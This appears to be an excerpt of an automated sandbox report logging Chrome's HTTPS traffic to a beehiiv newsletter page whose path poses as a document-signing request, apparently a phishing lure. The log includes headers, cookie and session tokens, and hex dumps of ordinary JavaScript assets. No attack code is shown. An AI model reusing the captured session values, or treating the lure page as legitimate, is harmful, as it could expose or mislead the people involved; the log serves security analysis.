                                                                                                                                            Data Ascii: sName:"text-sm font-medium text-gray-500",children:"Error Details"}),s.jsx("p",{className:"mt-2 text-sm text-gray-900",children:e.message}),e?.stack&&s.jsx("pre",{className:"mt-2 w-[360px] overflow-x-auto text-sm text-gray-900 sm:w-[480px]",children:e.sta


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            79192.168.2.1649802104.244.42.1364436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC407OUTGET /settings?session_id=5014ff864e2c4e055ad43236486b600cbc96bac6 HTTP/1.1
                                                                                                                                            Host: syndication.twitter.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            2025-01-15 18:14:36 UTC468INHTTP/1.1 200 OK
                                                                                                                                            date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            perf: 7402827104
                                                                                                                                            vary: Origin
                                                                                                                                            server: tsa_b
                                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                                            cache-control: must-revalidate, max-age=600
                                                                                                                                            last-modified: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            content-length: 870
                                                                                                                                            x-transaction-id: a237d87b7f475382
                                                                                                                                            strict-transport-security: max-age=631138519
                                                                                                                                            x-response-time: 6
                                                                                                                                            x-connection-hash: 3cc45b2df6705a70c672581468589324b5903bf85d8c6f8f48557b12e4223f3b
                                                                                                                                            connection: close
                                                                                                                                            2025-01-15 18:14:36 UTC870INData Raw: 7b 22 73 68 6f 75 6c 64 5f 6f 62 74 61 69 6e 5f 63 6f 6f 6b 69 65 5f 63 6f 6e 73 65 6e 74 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 73 22 3a 7b 22 74 66 77 5f 74 69 6d 65 6c 69 6e 65 5f 6c 69 73 74 22 3a 7b 22 62 75 63 6b 65 74 22 3a 5b 5d 2c 22 76 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 7d 2c 22 74 66 77 5f 66 6f 6c 6c 6f 77 65 72 5f 63 6f 75 6e 74 5f 73 75 6e 73 65 74 22 3a 7b 22 62 75 63 6b 65 74 22 3a 74 72 75 65 2c 22 76 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 7d 2c 22 74 66 77 5f 74 77 65 65 74 5f 65 64 69 74 5f 62 61 63 6b 65 6e 64 22 3a 7b 22 62 75 63 6b 65 74 22 3a 22 6f 6e 22 2c 22 76 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 7d 2c 22 74 66 77 5f 72 65 66 73 72 63 5f 73 65 73 73 69 6f 6e 22 3a 7b 22 62 75 63 6b 65 74 22 3a 22 6f 6e 22 2c 22 76 65 72 73
                                                                                                                                            Data Ascii: {"should_obtain_cookie_consent":false,"features":{"tfw_timeline_list":{"bucket":[],"version":null},"tfw_follower_count_sunset":{"bucket":true,"version":null},"tfw_tweet_edit_backend":{"bucket":"on","version":null},"tfw_refsrc_session":{"bucket":"on","vers


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            80192.168.2.1649806104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC840OUTGET /assets/index-BxYGUTX4.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 658
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"292-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4163
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8ae2a79c470-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 63 34 61 65 32 36 37 39 2d 37 36 31 39 2d 35 65 35 39 2d 62 65 35 61 2d 31 61 63 32 31 61 36 65 36 35 30 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c4ae2679-7619-5e59-be5a-1ac21a6e650e")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC200INData Raw: 3d 3e 73 2e 6a 73 78 28 61 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 78 28 65 2c 6f 29 2c 73 74 79 6c 65 3a 74 2c 72 65 66 3a 72 2c 63 68 69 6c 64 72 65 6e 3a 73 2e 6a 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6e 2c 63 68 69 6c 64 72 65 6e 3a 6d 7d 29 7d 29 3b 65 78 70 6f 72 74 7b 69 20 61 73 20 42 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 69 6e 64 65 78 2d 42 78 59 47 55 54 58 34 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 63 34 61 65 32 36 37 39 2d 37 36 31 39 2d 35 65 35 39 2d 62 65 35 61 2d 31 61 63 32 31 61 36 65 36 35 30 65 0a
                                                                                                                                            Data Ascii: =>s.jsx(a,{className:x(e,o),style:t,ref:r,children:s.jsx("div",{className:n,children:m})});export{i as B};//# sourceMappingURL=index-BxYGUTX4.js.map//# debugId=c4ae2679-7619-5e59-be5a-1ac21a6e650e


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            81192.168.2.1649808104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC851OUTGET /assets/PoweredByBeehiiv-BmLCj73J.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1900
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"76c-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4163
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8aede2b8c53-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 39 65 35 61 64 32 64 30 2d 30 34 63 66 2d 35 34 35 36 2d 61 39 38 39 2d 66 35 62 64 64 37 38 64 63 39 31 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="9e5ad2d0-04cf-5456-a989-f5bdd78dc911")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 72 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 33 30 20 33 30 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 23 30 42 30 44 32 41 22 2c 64 3a 22 4d 32 35 2e 36 39 32 20 31 33 2e 31 36 38 48 33 2e 38 36 36 63 2d 2e 35 35 36 20 30 2d 31 2e 30 31 2d 2e 34 35 38 2d 31 2e 30 31 2d 31 2e 30 31 37 56 31 30 2e 36 63 30 2d 31 2e 37 35 35 20 31 2e 34 31 34 2d 33 2e 31 37 38 20 33 2e 31 35 37 2d 33 2e 31 37 38 48 32 33 2e 35 32 63 31 2e 37 34 33 20 30 20 33 2e 31 35 37 20 31 2e 34 32 33 20 33 2e 31 35 37 20 33 2e 31 37 37 76 31 2e 35 35 61 2e 39 38 2e 39 38 20 30 20 30 20 31 2d 2e 39 38 35 20 31 2e 30 31 38 5a 4d 32 31 2e 30 39 32 20
                                                                                                                                            Data Ascii: 00/svg",fill:"none",className:r,viewBox:"0 0 30 30",children:e.jsx("path",{fill:"#0B0D2A",d:"M25.692 13.168H3.866c-.556 0-1.01-.458-1.01-1.017V10.6c0-1.755 1.414-3.178 3.157-3.178H23.52c1.743 0 3.157 1.423 3.157 3.177v1.55a.98.98 0 0 1-.985 1.018ZM21.092
                                                                                                                                            2025-01-15 18:14:36 UTC74INData Raw: 42 65 65 68 69 69 76 2d 42 6d 4c 43 6a 37 33 4a 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 39 65 35 61 64 32 64 30 2d 30 34 63 66 2d 35 34 35 36 2d 61 39 38 39 2d 66 35 62 64 64 37 38 64 63 39 31 31 0a
                                                                                                                                            Data Ascii: Beehiiv-BmLCj73J.js.map//# debugId=9e5ad2d0-04cf-5456-a989-f5bdd78dc911


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            82192.168.2.1649807104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC566OUTGET /assets/RedirectToHiddenInput-mUb4yii7.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC904INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 644
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"284-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8aefd135e6a-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC465INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 39 36 61 66 36 61 32 31 2d 64 30 62 35 2d 35 65 62 33 2d 61 61 64 61 2d 36 36 33 30 64 64 35 33 33 34 64 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="96af6a21-d0b5-5eb3-aada-6630dd5334d1")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC179INData Raw: 6e 70 75 74 22 2c 7b 74 79 70 65 3a 22 68 69 64 64 65 6e 22 2c 6e 61 6d 65 3a 22 72 65 64 69 72 65 63 74 5f 74 6f 22 2c 76 61 6c 75 65 3a 74 7c 7c 6f 7d 29 7d 3b 65 78 70 6f 72 74 7b 63 20 61 73 20 52 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 52 65 64 69 72 65 63 74 54 6f 48 69 64 64 65 6e 49 6e 70 75 74 2d 6d 55 62 34 79 69 69 37 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 39 36 61 66 36 61 32 31 2d 64 30 62 35 2d 35 65 62 33 2d 61 61 64 61 2d 36 36 33 30 64 64 35 33 33 34 64 31 0a
                                                                                                                                            Data Ascii: nput",{type:"hidden",name:"redirect_to",value:t||o})};export{c as R};//# sourceMappingURL=RedirectToHiddenInput-mUb4yii7.js.map//# debugId=96af6a21-d0b5-5eb3-aada-6630dd5334d1


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            83192.168.2.1649810104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC556OUTGET /assets/description-BklOXbF-.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC901INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1401
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"579-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8af2cd64364-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC468INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 37 35 63 33 39 39 64 30 2d 62 36 34 38 2d 35 30 62 38 2d 62 34 63 63 2d 64 37 31 35 66 34 61 65 65 34 30 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="75c399d0-b648-50b8-b4cc-d715f4aee401")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC933INData Raw: 20 74 3d 6e 65 77 20 45 72 72 6f 72 28 22 59 6f 75 20 75 73 65 64 20 61 20 3c 44 65 73 63 72 69 70 74 69 6f 6e 20 2f 3e 20 63 6f 6d 70 6f 6e 65 6e 74 2c 20 62 75 74 20 69 74 20 69 73 20 6e 6f 74 20 69 6e 73 69 64 65 20 61 20 72 65 6c 65 76 61 6e 74 20 70 61 72 65 6e 74 2e 22 29 3b 74 68 72 6f 77 20 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 26 26 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 28 74 2c 63 29 2c 74 7d 72 65 74 75 72 6e 20 6f 7d 66 75 6e 63 74 69 6f 6e 20 50 28 29 7b 6c 65 74 5b 6f 2c 74 5d 3d 6c 2e 75 73 65 53 74 61 74 65 28 5b 5d 29 3b 72 65 74 75 72 6e 5b 6f 2e 6c 65 6e 67 74 68 3e 30 3f 6f 2e 6a 6f 69 6e 28 22 20 22 29 3a 76 6f 69 64 20 30 2c 6c 2e 75 73 65 4d 65 6d 6f 28 28 29 3d 3e 66 75
                                                                                                                                            Data Ascii: t=new Error("You used a <Description /> component, but it is not inside a relevant parent.");throw Error.captureStackTrace&&Error.captureStackTrace(t,c),t}return o}function P(){let[o,t]=l.useState([]);return[o.length>0?o.join(" "):void 0,l.useMemo(()=>fu


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            84192.168.2.1649809104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC568OUTGET /assets/LoginWithPasswordAction-TVLpJaLq.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC901INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 3658
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"e4a-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8af48c642e0-EWR
